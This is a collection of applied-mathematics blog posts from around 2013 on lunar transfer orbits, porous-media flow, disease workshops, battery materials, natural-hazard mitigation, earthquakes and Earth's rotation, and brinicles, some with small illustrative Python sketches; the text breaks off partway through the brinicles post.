    The critical values of the semi-major axis that delineate the stable motions from the unstable ones are called “weak stability boundary” points. Exploring all angles of insertion and all values of the eccentricity of the elliptical orbit yields a “weak stability boundary” set; this appears to be some sort of fractal. See Fig. 2.

    Fig. 2. Weak Stability Boundary.

    All points in the weak stability boundary correspond to arrival points of low energy transfers from the Earth to the Moon. The spacecraft trajectories designed by this method yield fuel savings of 10-15%.

    The notion of a weak stability boundary was introduced by Edward Belbruno (Princeton University) in 1987; a documentary trailer on the discovery of this concept can be found on YouTube. The method was successfully applied, for the first time, for the rescue of the Japanese lunar mission Hiten in 1991. The recent mission GRAIL (Gravity Recovery and Interior Laboratory) of NASA, which took place in 2012, used the same transfer as Hiten. The purpose of this mission was to obtain a high-resolution mapping of the gravitational field of the Moon. For this purpose, two spacecraft were placed on the same orbit about the Moon, and their instruments measured the changes in their relative velocity very precisely; such changes were translated into changes of the gravitational field. (This technique had been tested previously for the mapping of Earth’s gravity as part of the mission GRACE – Gravity Recovery and Climate Experiment – a joint mission of NASA and the German Aerospace Center that has been operating since 2002.) A key point for the GRAIL mission was to place the two spacecraft on precisely the same lunar orbit; the weak stability boundary concept was quite suitable for this purpose.

    A deeper understanding of the weak stability boundary can be achieved by studying hyperbolic invariant manifolds. The motion of a spacecraft relative to the Earth-Moon system can be modeled through the three-body problem. In this model, the intertwining gravitational fields of the Earth and the Moon determine some “invisible pathways,” called stable and unstable manifolds, on which optimal transport is possible. Such manifolds already appear in the work of Henri Poincaré. It turns out, surprisingly, that these manifolds are deeply related to the weak stability boundary. More precisely, under some energy restriction, it can be proved geometrically that the weak stability boundary points lie on certain stable manifolds.

    Here are some recent references:
    Belbruno, E.; Gidea, M; Topputo, F. Weak stability boundary and invariant manifolds. SIAM J. Appl. Dyn. Syst. 9 (2010), no. 3, 1061–1089.
    Belbruno, E.; Gidea, M.; Topputo, F. Geometry of Weak Stability Boundaries. Qual. Theory Dyn. Syst. 12 (2013), no. 1, 53–66.

    Marian Gidea

    School of Mathematics
    Institute for Advanced Study
    Princeton
    and
    Department of Mathematics
    Northeastern Illinois University
    Chicago

    Posted in Astrophysics, Mathematics | Tagged | Leave a comment

    Discontinuous Pressure in Coupled Flows

    Pressure is an important property of fluid flow, and it is known that the pressure changes continuously in the fluid domain. In the coupling of flows of different nature, however, the situation can be more complicated and discontinuities may appear in the pressure field. This is the case, for example, in coupled free flows and flows in porous media. There has been a recent surge of interest in modeling and simulating these multi-physics problems. Coupled flows arise, for instance, in groundwater flow, where chemical contaminants leak into rivers or lakes and reach the porous rock at the bottom.

    The mathematical model is a domain-based coupled system of Stokes equations with Darcy’s law describing the rate at which a fluid flows through a permeable medium. An important part of the modeling problem is the choice of the conditions at the interface between the free flow region and the porous medium.

    A first condition states that the normal component of the velocity must be continuous across the interface. A second condition, referred to as the Beavers-Joseph-Saffman law, relates the tangential component of the free flow velocity to its shear stress. The latter law was derived from simple experiments on laminar tangential flows over a porous bed and was confirmed by homogenization techniques for periodic porous media with circular pores [1,2,3]. A third interface condition involving the pressure of the fluid remained controversial until quite recently. Some scientists claimed that the pressure in the free flow must be continuous and equal to the Darcy pressure at the interface, while others claimed that there must be a jump in the pressure. Two recent works by Mikelic and co-authors [4,5] show theoretically and numerically that the pressure is discontinuous across the interface and that the pressure jump is proportional to the free fluid shear. It is interesting to note that if the pores of the media are isotropic (circular), the discontinuity in the pressure vanishes.
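    Written schematically (sign and scaling conventions differ between papers, and the precise constants are derived in [4,5]), the three interface conditions, with n the unit normal to the interface and τ the unit tangent, read

    \[
    \begin{aligned}
    \mathbf{u}_f\cdot\mathbf{n} &= \mathbf{u}_p\cdot\mathbf{n}
      && \text{(conservation of mass)},\\
    -\,\boldsymbol{\tau}\cdot\bigl(2\mu\,\mathbf{D}(\mathbf{u}_f)\,\mathbf{n}\bigr)
      &= \frac{\alpha\mu}{\sqrt{K}}\,\mathbf{u}_f\cdot\boldsymbol{\tau}
      && \text{(Beavers--Joseph--Saffman)},\\
    p_p - p_f &\;\propto\; \boldsymbol{\tau}\cdot\bigl(2\mu\,\mathbf{D}(\mathbf{u}_f)\,\mathbf{n}\bigr)
      && \text{(pressure jump)},
    \end{aligned}
    \]

    where u_f, p_f are the free-flow (Stokes) velocity and pressure, u_p, p_p the Darcy velocity and pressure, D(u_f) the rate-of-strain tensor, μ the viscosity, K the permeability and α a slip coefficient; the proportionality constant in the last line is a boundary-layer constant that vanishes for isotropic (circular) pores.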

    Does this contradict the physical law of continuous pressure? No. The fluid pressure in the pores remains continuous. The pressure that appears in Darcy’s law is an average of the physical pressure of the fluid in the pores over a representative elementary volume. At the micro-scale, there is no real interface between the free flow and porous media. At the macro-scale, for general porous media, the continuum pressure is discontinuous across the interface, and the interface itself is part of the model.

    There are still many open questions related to the coupled free flows and porous media problem. An interdisciplinary effort combining analytical, experimental and numerical techniques is key to gaining a significant understanding of these coupled flows. For those interested in this problem, there will be a whole session dedicated to the modeling of these interface conditions at the 5th International Conference on Porous Media & Annual Meeting, organized this month in Prague.

    [1] G.S. Beavers and D.D. Joseph, Boundary conditions at a naturally permeable wall, J. Fluid Mech., 30, p.197-207, 1967.
    [2] P.G. Saffman, On the boundary condition at the interface of a porous medium, Studies in Applied Mathematics, 1, p. 93-101, 1971.
    [3] W. Jager, A. Mikelic, On the interface boundary conditions by Beavers, Joseph and Saffman, SIAM J. Appl. Math., 60, p. 1111-1127, 2000.
    [4] A. Marciniak-Czochra, A. Mikelic, Effective pressure interface law for transport phenomena between an unconfined fluid and a porous medium using homogenization, SIAM Multiscale modeling and simulation, 10, p. 285-305, 2012.
    [5] T. Carraro, C. Goll, A. Marciniak-Czochra, A. Mikelic, Pressure jump interface law for the Stokes-Darcy coupling: confirmation by direct numerical simulations, preprint arXiv:1301.6580 [math.NA], 2013.

    Beatrice Riviere
    Associate Professor
    Department of Computational and Applied Mathematics
    Rice University
    riviere@rice.edu

    Posted in Geophysics, Mathematics | Leave a comment

    SIAM News — Examining the Dynamics of Ocean Mixing

    “The science is clear,” climate scientist Emily Shuckburgh told an audience of nearly 800 people at San Francisco’s Palace of Fine Arts on March 4. “Our collective actions have generated a climate problem that threatens our future and our children’s future.” Shuckburgh’s talk was part of the Mathematics of Planet Earth 2013 Simons Public Lecture Series.

    So begins the SIAM News article by Erica Klarreich, Examining the Dynamics of Ocean Mixing (SIAM News, May 1, 2013). The text of the full article may be found here.

    Posted in Climate, Ocean | Leave a comment

    Workshop “Major and Neglected Diseases in Africa,” May 6-10, 2013

    A workshop on “Major and Neglected Diseases in Africa” was held at the University of Ottawa, May 6-10, 2013. This workshop brought together researchers, experts and students from public health, disease modelling, and medicine who study the effects of diseases in African populations. Participants and speakers came from Africa, Europe, and the Americas.

    Africa is a continent that has been and still is plagued by infectious diseases. Most notable are the current epidemics caused by HIV, Tuberculosis and Malaria. But there are many other diseases, both treatable and preventable, that also affect African populations. The workshop focused on HIV, Tuberculosis, Malaria, Polio, Neglected Tropical Diseases and surveillance. One day was devoted to each of the “big three” (HIV, Tuberculosis and Malaria) and two days to Neglected Tropical Diseases, Polio, surveillance, and a discussion of the effects of disease on children. Each day featured four plenary talks and two discussion sessions. In the discussion sessions, participants identified gaps in our knowledge and discussed the role of mathematical modelling in the particular theme areas. A group of researchers will follow through on these discussions and initiate a new collaborative network.

    The objectives of the workshop were:
    (a) To combine the expertise of public health officials and researchers in biology and the mathematical sciences in the areas of infectious diseases relevant to Africa;
    (b) To encourage and seek participation of African colleagues, to foster collaborations between Canadian and African researchers;
    (c) To compare public health policies and experiences, helping all participants develop a better understanding of this difficult yet crucial aspect of disease control; and
    (d) To train junior researchers, postdoctoral fellows and graduate students.

    The organizers of this workshop were Jane Heffernan (York University) and Julien Arino (University of Manitoba), both affiliated with the Centre for Disease Modelling at York University.

    More information regarding the workshop can be found here.

    Note added by the editor:
    A post on Neglected Tropical Diseases by Robert Smith? is scheduled for publication on the MPE2013 Daily Blog on May 18, 2013.

    Posted in Disease Modeling, Epidemiology, Public Health, Workshop Announcement | Leave a comment

    Of Cats and Batteries

    What do cats and batteries have in common? Not much, you might think. After all, cats are cuddly and purr. Batteries? They power your flashlights and cellphones, but no one wants a battery sitting on their lap while they watch TV.

    Cats were the subject of a recent, surprising news item. A group of computer scientists at Google and Stanford University fed YouTube videos to a computer that was running a “machine learning” program. This program “trains” on the input to find clusters of similar images and once it’s trained, the computer can classify new images as belonging to one of the clusters. After training on images from ten million YouTube videos, the computer learned to reliably identify images of cats. Like a newborn baby, the computer started with no knowledge but learned to identify objects – in this case cats – based on what it had already seen. This exercise illustrates the ability of machine learning to enable recognition tasks such as speech recognition, as well as classification tasks such as identifying cat faces as a distinct category of images.

    Batteries deserve attention on this website because of their essential role in any strategy for sustainable energy. Batteries are a primary means for storing, transporting and accessing electrical energy. For example, they provide storage of excess energy from wind and solar sources and enable electrical power for cars and satellites. Today’s hybrid and electric vehicles depend on lithium-ion batteries, but the performance of these vehicles is limited by the energy density and lifetime of these batteries. To match the performance of internal combustion vehicles, researchers estimate that the energy density of current batteries would need to increase by a factor of 2 to 5.

    Strategies for achieving these gains depend on identifying new materials with higher energy densities. The traditional method for finding new materials is to propose a material based on previous experience, fabricate it, and measure its properties, all of which can be expensive and time-consuming. More recently, computational methods, such as density functional theory, have been used to accurately predict the properties of hypothetical materials. This removes the fabrication step but can involve large-scale computing. Although both of these methods have produced many successful new materials, the time and expense of the methods limit their applicability.

    Cats – more precisely, the machine learning program that recognized cats – could come to the rescue. Instead of watching YouTube videos, a machine learning method could train on existing databases (from both experiment and computation) of properties for known materials and learn to predict the properties for new materials. Once the machine learning method is trained (which can be a lengthy process), its prediction of material properties should be very fast. This would enable a thorough search through chemical space for candidate materials. Machine learning methods have not yet been used for finding materials for batteries, but they have been used for prediction of structural properties, atomization energies, and chemical reaction pathways. Their use in materials science is growing rapidly, and we expect that they will soon be applied to materials for batteries and other energy applications.
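    To make the train-then-screen idea concrete, here is a toy sketch in Python using scikit-learn. The "database" is synthetic stand-in data, the six descriptors are generic placeholders for real composition or structure features, and the target property is an arbitrary function, so nothing here corresponds to an actual battery material.

    import numpy as np
    from sklearn.ensemble import RandomForestRegressor

    rng = np.random.default_rng(0)

    # Synthetic stand-in for a materials database: rows are descriptor vectors,
    # the "property" is an arbitrary nonlinear function of them plus noise.
    X_known = rng.uniform(0, 1, size=(500, 6))
    y_known = (X_known[:, 0]**2 + np.sin(3 * X_known[:, 1]) - X_known[:, 2]
               + 0.05 * rng.normal(size=500))

    # Training can be slow for real data sets...
    model = RandomForestRegressor(n_estimators=200, random_state=0)
    model.fit(X_known, y_known)

    # ...but screening new candidates afterwards is fast.
    X_candidates = rng.uniform(0, 1, size=(100_000, 6))
    predicted = model.predict(X_candidates)
    best = np.argsort(predicted)[-5:]
    print("Most promising candidates:", best, predicted[best].round(2))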

    Russ Caflisch, Director
    Institute for Pure & Applied Mathematics (IPAM)

    Posted in Energy, Machine Learning | Leave a comment

    Guinea Worms, the Carter Center, and Mathematics

    A couple of weeks ago I saw former president Jimmy Carter on the Daily Show. The story he told Jon Stewart was nothing short of amazing. Through persistent efforts over the past twenty-five years, his foundation has essentially eradicated guinea worm disease. In 1986 there were literally millions of cases each year in Africa and Asia, whereas so far in 2013 there have been only 7 reported cases.

    The Guinea worm is a parasite that humans acquire by drinking unclean water. The worms can grow to several feet in length and then painfully emerge from the body basically any way they can.

    Carter’s foundation invented a strainer made of a fine material — something like parachute silk. They manufactured enough of these sieves to distribute to every afflicted village. That was the easy part. Then they had to persuade people to drink the water from their ponds only after straining it through the sieve. One major issue they encountered was that sometimes the local people regarded the pond water as holy and didn’t want to cause offense to the powers that be by introducing a foreign device. It was necessary to convince people almost literally one-by-one that the worms were basically aliens that had invaded the holy water and it was ok to strain them out.

    You are probably asking, “Where is the mathematics in here?” I see several analogies. One is that the solution was counterintuitive and was arrived at only after many trials and many errors. Also, the solution, or variations of it, had to be applied on a case-by-case basis, not unlike the case-by-case analysis that is present in many mathematical proofs, such as the proof of the 4-color theorem or of Kepler’s conjecture. The solution also required the sustained collaborative effort of many individuals to go to each village and make the necessary arguments that would persuade the villagers to behave in an unfamiliar and even abhorrent way that was not part of their culture. I also see elements of the logistical analysis of operations research in the solution here. The exact steps have to be carried out in the right order.

    The Carter Center’s persistence in developing a solution and carrying it out over a 25-year period also reminds me of the dogged determination that many mathematicians exhibit in the relentless pursuit of a solution that many would have earlier given up on. Finally, I see the success of a large-scale collaborative effort, which reminds me of some ongoing large-scale collaborative mathematical efforts requiring the cooperation of thousands of individuals, such as finding new Mersenne primes, verifying that trillions of zeros of the Riemann zeta-function are all on the critical line, or Tim Gowers’ polymath projects.

    To see the clip of Jimmy Carter on the Daily Show, click here.

    I also recommend this article about guinea worms.

    Posted in General, Mathematics, Public Health | Leave a comment

    Management of Variability and Uncertainty in Energy Systems

    An interesting collection of web videos from the Energy Systems Week at the Isaac Newton Institute.

    The meeting made progress on some of the difficult problems now arising in large electrical energy networks, in particular the management of variability and uncertainty in these systems.

    Posted in Energy, Uncertainty Quantification | Leave a comment

    Fields Institute — Focus Program on Commodities, Energy, and Environmental Finance

    Commodities and energy markets continue to grow in activity and influence. Because of the growing concern about environmental issues inherent to the production and consumption of energy, quantitative insights into these marketplaces are crucial for sustainable development and policy making with respect to climate change.

    How do we model the strategic behavior of existing oil producers facing new green energy competitors? Can we design an effective and fair market for CO2 emission allowances? How do we quantify the gains from building more efficient electricity grids? What are the best ways of sharing weather risk?

    These and other questions are part of ongoing research trends in Financial Mathematics. Stochastic modeling has provided a fertile interdisciplinary approach to analyzing the design, valuation, trading and risk management of commodity contracts. Energy policy-making, moving from exhaustible fuel sources to renewable ones, accounting for spikes in electricity prices in response to demand and weather, controlling carbon emissions from polluting industries, and regulating the speculative role of financial traders in commodity markets are some of the major new challenges facing researchers at the interface of finance, economics, insurance, and stochastic analysis. These issues, which are central to the themes of MPE, highlight another facet of applied mathematics that helps our understanding of the environment.
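    A very small example of the kind of stochastic model involved: a mean-reverting log spot price with an added jump component standing in for spikes. All parameters below are placeholders chosen for illustration, not estimates from any market.

    import numpy as np

    rng = np.random.default_rng(1)

    # Toy electricity spot-price model: Ornstein-Uhlenbeck log-price plus jumps.
    T, n = 1.0, 365                            # one year of daily steps
    dt = T / n
    kappa, mu, sigma = 5.0, np.log(50.0), 0.5  # mean reversion, level, volatility
    jump_rate, jump_mean = 10.0, 1.0           # spikes per year, mean jump size

    logp = np.empty(n + 1)
    logp[0] = mu
    for i in range(n):
        jump = rng.exponential(jump_mean) if rng.random() < jump_rate * dt else 0.0
        logp[i + 1] = (logp[i] + kappa * (mu - logp[i]) * dt
                       + sigma * np.sqrt(dt) * rng.normal() + jump)
    price = np.exp(logp)
    print("Mean price %.1f, maximum (spike) price %.1f" % (price.mean(), price.max()))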

    As part of Mathematics of Planet Earth activities, the Fields Institute in Toronto, ON, Canada, will host a Focus Program on Commodities, Energy, and Environmental Finance during August 6-30, 2013. The Focus Program is dedicated to exposing its participants to the state of the art in this young field, which is developing rapidly, spurred by connections with many other areas of applied mathematics.

    Among the topics that will be discussed are the increased “financialization” of commodities markets, analysis of oligopolies in energy markets, equilibrium and risk transfer in environmental finance, stochastic control of energy, electricity and commodity markets and modeling of electricity supply and demand. Associated mathematical developments include nonlinear PDEs, backward SDEs, mean-field games, inverse problems, risk measures and high-dimensional stochastic control.

    The Focus Program’s activities include a Summer School during August 6-27, 2013 with 3 mini-courses given by F. Benth, R. Carmona and G. Swindle, as well as two Workshops:

    Aug 14-16, 2013: Workshop on Electricity, Energy and Commodities Risk Management
    Aug 27-29, 2013: Workshop on Stochastic Games in Environmental Finance

    More information can be found here.

    Mike Ludkovski (UCSB)

    Posted in Climate, Economics, Finance, Mathematics, Uncertainty Quantification, Workshop Announcement | Leave a comment

    Another Applied Mathematician in Antarctica

    I recently had the opportunity to travel to the Antarctic peninsula on board the National Geographic Explorer. We departed out of Ushuaia, Argentina, crossed the Drake Passage and spent the better part of a week exploring the northwestern side of the Antarctic peninsula from the South Shetland Islands to just inside the Antarctic Circle in Crystal Sound.

    I was traveling with an alumni group from St. Olaf College led by Physics Professor and Geophysicist Robert Jacobel, who had traveled to Antarctica numerous times to do ice radar and remote sensing research, most recently with the Whillans Ice Stream Subglacial Access Research Drilling (WISSARD) project in West Antarctica.* In addition to Jacobel’s expertise on glaciers and ice, the NG Explorer was staffed with numerous naturalists with expertise in Antarctic marine mammals, sea birds, underwater creatures, global climate dynamics as well as the history of Antarctic exploration in general. As an applied mathematician who has studied fluid dynamics, solidification/melting and mushy layer formation in aqueous systems computationally and in the lab, the opportunity to see first-hand Antarctica’s version of these processes was very exciting. I was in the Earth’s cold lab getting a guided tour of science in action.

    Neko Harbor

    From a purely touristic point of view the Antarctic peninsula, via the comfortable NG Explorer, was a fabulous place to travel. Each day greeted us with new experiences that stimulated the senses: sights of vast glaciers and countless icebergs, the up-close sounds of humpback whales surfacing to breathe alongside our Zodiac, the smell of a Chinstrap penguin colony, the endless rocking motion crossing the Drake Passage, and the chilling sensation of a quick dip in the sheltered waters of Deception Island. Maybe not Shackleton’s exact experience (I would not have minded getting beset in ice to extend our time down there a bit longer), but it’s the spirit of adventure and discovery that counts.

    At the same time, as an applied mathematician I felt immersed in a very unique laboratory environment. I found myself sitting in the midst of a penguin colony and watching the adults defend their chicks from skuas, work tirelessly building rock nests one carefully-selected rock at a time, or go out in search of everyone’s favorite biomass – Euphausia superba, Antarctic krill. I want to write down a population dynamics model for a penguin colony, calculate krill consumption factors, couple it to predatory leopard seals and skuas and factor in rare events such as an ill-timed snow storm that may determine the success or failure of the entire colony’s breeding season. Then I get distracted by a giant chunk of ice that calves from a glacier and I start thinking about ice sheets, ice shelves and grounding lines. A penguin waddles by and I snap a photo. He smells like krill. I wonder what it is about sea ice that the krill like so much. Maybe they know something about mushy layers that I do not.
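    For what it is worth, the back-of-the-envelope model I have in mind might start out as small as the consumer-resource sketch below, with a brief extra mortality pulse standing in for an ill-timed storm. Every number in it is invented for illustration.

    import numpy as np
    from scipy.integrate import solve_ivp

    r, Kk = 2.0, 1000.0       # krill growth rate and carrying capacity
    a, eps = 0.01, 0.05       # consumption rate, conversion efficiency
    m = 0.1                   # baseline penguin mortality
    storm = lambda t: 0.5 if 4.0 < t < 4.2 else 0.0   # short mortality pulse

    def rhs(t, y):
        krill, penguins = y
        dk = r * krill * (1 - krill / Kk) - a * krill * penguins
        dp = eps * a * krill * penguins - (m + storm(t)) * penguins
        return [dk, dp]

    sol = solve_ivp(rhs, [0, 10], [800.0, 50.0], max_step=0.01)
    print("Final krill and penguin numbers:", sol.y[:, -1].round(1))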

    There is a great history of scientific research in Antarctica and applied mathematicians have certainly made important contributions. Readers of this blog will already know about previous entries by Hans Kaper: Mathematician stepping on thin ice (January 12, 2013) and by Robert Bryant: From the JMM – Porter Lecture by Professor Ken Golden (January 13, 2013). As an interested reader I would like to bring a few other contributions to your attention. I know I am biased, but to me there is nothing more quintessentially applied math than the method of matched asymptotic expansions. An excellent example of this in the context of marine ice sheet dynamics can be found in papers by Christian Schoof [Marine ice-sheet dynamics. Part 1. The case of rapid sliding. Journal of Fluid Mechanics 573 (2007) 27–55 and Marine ice sheet dynamics. Part 2. A Stokes flow contact problem. Journal of Fluid Mechanics 679 (2011) 122–155]. In fact, there has been a lot of applied mathematics activity in the area of ice-sheet, ice-shelf and grounding-line dynamics. The ice sheets covering West Antarctica, which motivate many of these studies, rest on bedrock below sea level and consequently play a particularly important role in the global climate dynamics picture.

    Having spent some time sitting and watching penguins and their infinitely interesting behaviors I was interested to see in the recent literature a contribution from a group of applied mathematicians on the huddling behavior of penguins [A. Waters, F. Blanchette and A.D. Kim, Modeling Huddling Penguins, PLOS ONE 7 (2012) e50277]. This fluid and heat transfer model incorporates a penguin-behavior component to test the idea that penguins huddle to reduce their exposure to the cold.

    Despite the grandness, importance and allure of a place like Antarctica, there is no shortage of applied mathematics opportunities closer to home. The previous bloggers have highlighted many of these. May we all find opportunities to make 2013 a successful year for our planet.

    Daniel Anderson
    Professor, Mathematical Sciences
    George Mason University
    and
    Faculty Researcher
    Applied and Computational Mathematics Division
    National Institute of Standards and Technology

    The views presented here are those of the author and do not necessarily represent the views or policies of NIST.

    *For those of you interested in reading blogs check out the WISSARD Blog Site.

    Posted in Biodiversity, Cryosphere, General | Leave a comment

    Finding a Sensible Balance for Natural Hazard Mitigation with Mathematical Models

    Uncertainty issues are paramount in the assessment of risks posed by natural hazards and in developing strategies to alleviate their consequences. In a paper published last month in the SIAM/ASA Journal on Uncertainty Quantification, the father-son team of Jerome and Seth Stein describe a model that estimates the balance between costs and benefits of mitigation following natural disasters, as well as rebuilding defenses in their aftermath. Using the 2011 Tohoku earthquake in Japan as an example, the authors help answer questions regarding the kinds of strategies to employ against such rare events.

    “Science tells us a lot about the natural processes that cause hazards, but not everything,” says Seth Stein. “Meteorologists are steadily improving forecasts of the tracks of hurricanes, but forecasting their strength is harder. We know a reasonable amount about why and where earthquakes will happen, some about how big they will be, but much less about when they will happen.”

    Earthquake cycles, triggered by movement of the Earth’s tectonic plates and the resulting stress and strain at plate boundaries, are irregular in time and space, making it hard to predict the timing and magnitude of earthquakes and tsunamis. Another conundrum for authorities in such crisis situations is the appropriate amount of resources to direct toward a disaster zone.

    In this paper, the authors set out to “find the amount of mitigation—which could be the height of a seawall or the earthquake resistance of buildings—that is best for society,” explains Stein. “The challenge is deciding how much mitigation is enough. Although our first instinct might be to protect ourselves as well as possible, resources used for hazard mitigation are not available for other needs.”

    The objective is to provide methods for authorities to use their limited resources in the best possible way in the face of uncertainty.

    Selecting an optimum strategy depends on estimating the expected value of damage. This, in turn, requires prediction of the probability of disasters. It is still unknown whether the probability of a large earthquake on a fault should be assumed constant in time (as routinely done in hazard planning) or whether the probability drops just after the last event and then increases with time.

    Hence, the authors incorporate both these scenarios using the general probability model of drawing balls from an urn. If an urn contains balls that are labeled “E” for event and “N” for no event, each year is like drawing a ball. Following the draw, the ball can be replaced or not replaced in the urn based on whether or not the probability of an event depends on a previous event having occurred and the time since the past occurrence. The model also incorporates parameters for strain accumulation at plate boundaries as well as strain release during earthquakes.
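    A small Monte Carlo version of this urn picture (with hypothetical ball counts and a simplified refill rule, not the bookkeeping used in the paper) shows how replacement versus non-replacement changes the statistics of the recurrence times:

    import numpy as np

    rng = np.random.default_rng(2)

    def recurrence_times(replace, n_events=5000, n_E=1, n_N=99):
        """Years between 'E' draws. If replace is False, one 'N' ball is
        removed after each quiet year, so the event probability grows with
        the time since the last event."""
        times, n, wait = [], n_N, 0
        while len(times) < n_events:
            wait += 1
            if rng.random() < n_E / (n_E + n):   # drew an "E" ball
                times.append(wait)
                wait, n = 0, n_N                 # reset the urn after an event
            elif not replace and n > 1:
                n -= 1
        return np.array(times)

    for replace in (True, False):
        t = recurrence_times(replace)
        print("replacement =", replace,
              ": mean interval %.1f yr, std %.1f yr" % (t.mean(), t.std()))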

    The optimal mitigation strategy is selected by using a general stochastic model. The authors minimize the sum of the expected present value of damage, the costs of mitigation, and a risk premium, which reflects the variance, or inconsistency, of the hazard. The optimal mitigation is found at the bottom of a U-shaped curve summing the cost of mitigation and the expected losses, a sensible balance.

    Natural Hazard - Cost vs. Mitigation Level

    How much mitigation is needed? This is the bottom of a U-shaped curve that is the total cost – the sum of both the cost of mitigation and the expected losses in a disaster. More mitigation can reduce losses in possible future disasters, at increased cost. Less mitigation reduces costs, but can increase potential losses. The bottom of the curve is a “sweet spot” – a sensible balance.
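    A schematic version of that trade-off is easy to write down; the cost and loss functions below are purely illustrative and are not those used by the authors.

    import numpy as np

    x = np.linspace(0, 10, 1001)               # mitigation level (e.g., seawall height)
    cost = 2.0 * x                             # cost of mitigation (illustrative)
    expected_loss = 100.0 * np.exp(-0.5 * x)   # expected losses (illustrative)
    total = cost + expected_loss               # U-shaped total cost

    i = np.argmin(total)
    print("Optimal mitigation level ~ %.2f, minimum total cost ~ %.1f" % (x[i], total[i]))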

    To determine the advantages and pitfalls of rebuilding after such disasters, the authors present a deterministic model. Here, outcomes are precisely determined by taking into account relationships between states and events.

    Such models can also be applied toward other disaster situations, such as hurricanes and floods, and toward policies to diminish the effects of climate change. “Given the damage to New York City by the storm surge from Hurricane Sandy, options under consideration range from doing nothing, using intermediate strategies like providing doors to keep water out of vulnerable tunnels, to building up coastlines or installing barriers to keep the storm surge out of rivers,” explains Stein. “In this case, a major uncertainty is the effect of climate change, which is expected to make flooding worse because of the rise of sea levels and higher ferocity and frequency of major storms. Although the magnitude of these effects is uncertain, this formulation can be used to develop strategies by exploring the range of possible effects.”

    To read the detailed article and view the source paper, click here.

    Posted in Mathematics, Natural Disasters, Risk Analysis, Uncertainty Quantification | Leave a comment

    Why do earthquakes change the speed of rotation of the Earth?

    MPE2013 gives us an opportunity to learn more about our planet. There are interesting features to be explored that require simple but deep principles of physics and that can become the basis of a discussion in the classroom. I frequently teach future high-school teachers and like to start by exploring questions that come from many different directions. Here is one.

    During an earthquake, the mass distribution in the Earth’s crust changes. This changes the Earth’s moment of inertia, which is the sum of the moments of inertia of all its point masses. The moment of inertia of a point mass is the product of its mass and the square of its distance to the axis of rotation. Meanwhile the angular momentum is preserved: this angular momentum is the sum over all point masses of the moment of inertia times the angular velocity. Hence, if the moment of inertia of the Earth decreases (increases), the angular velocity of the Earth increases (decreases). The simple physical principle of conservation of angular momentum thus allows us to explain disparate phenomena such as the Earth’s changing rotation rate, figure skaters spinning, spinning tops, and gyroscopic compasses.
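    In symbols, with I the moment of inertia, ω the angular velocity and T = 2π/ω the length of the day, conservation of angular momentum gives

    \[
    I_1\omega_1 = I_2\omega_2
    \quad\Longrightarrow\quad
    \frac{\Delta\omega}{\omega}\approx-\frac{\Delta I}{I},
    \qquad
    \frac{\Delta T}{T}\approx\frac{\Delta I}{I},
    \]

    so the 1.8-microsecond shortening of the day quoted below corresponds to a fractional decrease of the Earth’s moment of inertia of roughly \(1.8\times10^{-6}\,\mathrm{s}/86\,400\,\mathrm{s}\approx 2\times10^{-11}\).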

    The major earthquakes in Chile (2010) and Japan (2011) increased the Earth’s spin and hence decreased the length of the day. We could imagine that the length of the day would be measured by taking, for instance, a star as some fixed point of reference. But instead, geophysicists use seismic estimates, through GPS measurements, of the movements of the fault to compute how the mass distribution and thus the length of the day has changed. According to Richard Gross, a geophysicist working at NASA’s Jet Propulsion Laboratory, the length of the day has decreased by 1.8 microseconds as a result of the 2011 Japan earthquake.

    Instead of continuing to read Richard Gross’ interview, you can play the game yourself and discover the answers to the next questions. For instance, earthquakes closer to the Equator have a larger effect on the Earth’s spin than those close to the poles. Similarly, those with vertical motion have a larger effect than those with horizontal transversal motion.

    It is also an opportunity to start discussing the motion of a solid (here the Earth) in space. On short intervals of time, the speed of the center of mass is approximately constant. Hence, if we consider a reference frame centered at the center of mass and moving uniformly, then we are left with three degrees of freedom for the movement of the solid. The derivative of this movement is a linear orthogonal transformation preserving the orientation. Hence, it is a rotation around an axis: the north-south axis. The three degrees of freedom describe the position of the axis and the angular velocity around it. But there is a second axis, which is very important: the Earth’s figure axis, about which the Earth’s mass is balanced. This axis is offset from the north-south axis by about 10 meters. Large earthquakes abruptly move the position of this axis. For the 2011 Japan earthquake, the shift has been estimated at 17 centimeters.

    Earthquakes are far from being the only phenomena changing the angular speed of rotation and the position of the Earth’s figure axis. Indeed, they change with atmospheric winds and oceanic currents, but these changes are smoother than the ones observed with earthquakes.

    Should we care about such small changes? According to Richard Gross, we should if we work for NASA and, for instance, intend to send a spacecraft to Mars and land a rover on it. Any angular error may send us very far from our target.

    Christiane Rousseau

    Posted in Geophysics, Natural Disasters | Leave a comment

    Brinicles and Chemical Gardens

    The ship drove fast, loud roared the blast,
    And southward aye we fled.

    And now there came both mist and snow,
    And it grew wondrous cold:
    And ice, mast-high, came floating by,
    As green as emerald.

    And through the drifts the snowy clifts
    Did send a dismal sheen:
    Nor shapes of men nor beasts we ken–
    The ice was all between.

    The ice was here, the ice was there,
    The ice was all around:
    It cracked and growled, and roared and howled,
    Like noises in a swound!

    Coleridge’s ancient mariner voyaged to the southern seas around what we now call Antarctica. Beneath the ice pack around the continent that he describes so vividly, the BBC recently filmed for the first time the growth of a strange tube of ice hanging down into the ocean from the floating ice. They entitled their fascinating film “‘Brinicle’ ice finger of death”. You can see why if you watch it here. When the brinicle touches the sea floor, it entombs all it touches, including starfish and sea urchins, in ice.

    I saw that amazing brinicle footage at the end of 2011 when I was busy writing up a large ice physics review paper. I included in it the bibliography I found on ‘ice stalactites’ or brinicles, from the 1970s; there wasn’t much.

    A diver observes brinicles under the Antarctic ice pack (thanks to Rob Robbins, Hubert Staudigel, and the US Antarctic Program for the picture).

    As well as the physics of ice, I’m also investigating another example of wonderful patterns in nature: chemical gardens. You may, like me, have played with making these strange crystal growths as a child; my chemistry set contained all the ‘ingredients’ (or, as a chemist would say, reagents) to make them.

    Chemical gardens also form tubes, like brinicles, although generally at a much smaller scale. I realized that these brinicle ice tubes could be seen as a form of chemical garden growth, and with my colleagues Bruno Escribano, Diego Gonzalez, Ignacio Sainz, and Idan Tuval I developed the idea. The key to understanding how they grow is that the process depends on salt. As their name implies, brinicles form from briny water – Coleridge reminds us in one of the most famous lines of the Ancient Mariner that the seas are not pure water, but salty brine:

    “Water, water, every where,
    Nor any drop to drink.”

    We worked out the mechanisms of the brinicle formation process, which turns out to have basically the same physics as chemical gardens in the laboratory, and we have just published a paper about this.

    Brinicle Formation

    Brine emerging from the tip of the tube of a growing brinicle (again thanks to Rob Robbins, Hubert Staudigel, and the US Antarctic Program for the picture).

